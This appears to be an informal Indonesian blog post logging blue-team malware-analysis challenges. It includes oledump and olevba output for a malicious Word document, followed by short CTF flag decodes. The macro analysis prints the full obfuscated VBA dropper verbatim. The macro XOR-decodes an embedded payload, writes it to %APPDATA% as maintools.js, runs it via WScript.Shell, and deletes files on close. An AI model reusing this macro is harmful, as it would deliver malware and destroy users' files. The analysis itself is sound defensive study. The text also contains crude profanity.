Project IDEK
Project IDEK

Challenge Semalam Belajar Tanpa AI - Day 4

IDEK included in No AI
 About 800 words 4 minutes 

Deskripsi

Sorry kemarin keskip beberapa hari, males banget nulis cok aseli cringe bgt, habisin banyak waktu jg oaowokoakwookaw.

Malware Analysis

Langsung aja lah ya males yapping, nama challengenya Obfuscated, di platform blue team favorit gw.

SHA256SUM

berikut adlah hasil sha256sumnya :

ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751

Macro Document Analysis (Oledump)

Buat analisisnya, kita perlu tools oletools dan oledump. Nah tinggal jalanin aja, ini hasil dari oledumpnya :

  1:       114 '\x01CompObj'
  2:       284 '\x05DocumentSummaryInformation'
  3:       392 '\x05SummaryInformation'
  4:      8017 '1Table'
  5:      4096 'Data'
  6:       483 'Macros/PROJECT'
  7:        65 'Macros/PROJECTwm'
  8: M    7117 'Macros/VBA/Module1'
  9: m    1104 'Macros/VBA/ThisDocument'
 10:      3467 'Macros/VBA/_VBA_PROJECT'
 11:      2964 'Macros/VBA/__SRP_0'
 12:       195 'Macros/VBA/__SRP_1'
 13:      2717 'Macros/VBA/__SRP_2'
 14:       290 'Macros/VBA/__SRP_3'
 15:       565 'Macros/VBA/dir'
 16:        76 'ObjectPool/_1541577328/\x01CompObj'
 17: O   20301 'ObjectPool/_1541577328/\x01Ole10Native'
 18:      5000 'ObjectPool/_1541577328/\x03EPRINT'
 19:         6 'ObjectPool/_1541577328/\x03ObjInfo'
 20:    133755 'WordDocument'

Bisa kita lihat bahwa ada macro vba dari stream 8 sampe stream 15.

Macro Document Analysis (Olevba)

Berikut adalah hasil olevbanya :

olevba 0.60.2 on Python 3.13.5 - http://decalage.info/python/oletools
===============================================================================
FILE: 49b367ac261a722a7c2bbbc328c32545
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: 49b367ac261a722a7c2bbbc328c32545 - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: 49b367ac261a722a7c2bbbc328c32545 - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Public OBKHLrC3vEDjVL As String
Public B8qen2T433Ds1bW As String
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
Dim THQNfU76nlSbtJ5nX8LY6 As Byte
THQNfU76nlSbtJ5nX8LY6 = 45
For i = 0 To M5wI32R3VF2g5B21EK4d - 1
EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
Next i
Q7JOhn5pIl648L6V43V = True
End Function
Sub AutoClose()
On Error Resume Next
Kill OBKHLrC3vEDjVL
On Error Resume Next
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
Set R7Ks7ug4hRR2weOy7 = Nothing
End Sub
Sub AutoOpen()
On Error GoTo MnOWqnnpKXfRO
Dim NEnrKxf8l511
Dim N18Eoi6OG6T2rNoVl41W As Long
Dim M5wI32R3VF2g5B21EK4d As Long
N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
NEnrKxf8l511 = FreeFile
Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
Dim E2kvpmR17SI() As Byte
ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
Get #NEnrKxf8l511, 1, E2kvpmR17SI
Dim KqG31PcgwTc2oL47hjd7Oi As String
KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
Dim VUy5oj112fLw51h6S
Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
Dim Y5t4Ul7o385qK4YDhr
If I4j833DS5SFd34L3gwYQD.Count = 0 Then
GoTo MnOWqnnpKXfRO
End If
For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
Exit For
Next
Dim Wk4o3X7x1134j() As Byte
Dim KDXl18qY4rcT As Long
KDXl18qY4rcT = 16827
ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
GoTo MnOWqnnpKXfRO
End If
B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
B8qen2T433Ds1bW = Environ("appdata")
End If
Set R7Ks7ug4hRR2weOy7 = Nothing
Dim K764B5Ph46Vh
K764B5Ph46Vh = FreeFile
OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
Close #K764B5Ph46Vh
Erase Wk4o3X7x1134j
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
ActiveDocument.Save
Exit Sub
MnOWqnnpKXfRO:
Close #K764B5Ph46Vh
ActiveDocument.Save
End Sub

Kalau kita lihat dan analisis bagian bawah, terdapat script yang ngejalanin wscript.shell, yaitu ini :

Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"

Nah jadi potongan script di atas akan ngejalanin wscript dengan 2 argument, dan argument yang terakhir yaitu EzZETcSXyKAdF_e5I2i1 merupakan keynya. Kalau kita telusuri lagi, kan OBKHLrC3vEDjVL jadi argumen pertama, nah string tsb dideklarasikan sebagai berikut

OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh

Jadi string tadi akan ngelakukan execute terhadap program bernama maintools.js.

Malware Analysis Kedua

Yang pertama gw ga selesaiin males cok udah gede main maldoc maldocan. Juancok baru awal aja langsung emosi cok kontol

Malware000 Initial Analysis

Ketika di strings dapet flag

ZmxhZzwwb3BzX2lfdXNlZF8xMzM3X2I2NF9lbmNyeXB0aW9uPgo=

echo "ZmxhZzwwb3BzX2lfdXNlZF8xMzM3X2I2NF9lbmNyeXB0aW9uPgo=" | base64 -d      
flag<0ops_i_used_1337_b64_encryption>

just_some_js Initial Analysis

JSfuck biasa, tinggal decode aja pake https://www.dcode.fr/jsfuck-language nanti dapet flag

console.log("flag<what_a_cheeky_language!1!>")

this_is_not_js Initial Analysis

Brainfuck, tinggal decode pake https://www.dcode.fr/brainfuck-language nanti dapet flagnya

flag<Now_THIS_is_programming>

Malware101 Initial Analysis

Buka pake IDA, ntar keliatan ada charnya, nah tinggal balikin manual. Pasted%20image%2020250806001019.png

Kesimpulan

Mager bgt nulis, sorry klaau di blog yang ini kurang nyaman dibaca, tujuan gw bukan buat share, cm buat ninggalin jejak aja biar tau lah progress gw gimana. Pokoknya yang series challenge harian itu emang tujuan gw pure buat track progress aja, kalau kalian mau baca baca, gw lebih saranin ke categories selain No Ai Terimakasih banyak btw, good night.

Updated on Aug 5, 2025 
CC BY-NC-SA 4.0
Malware-Analysis
Back | Home
0%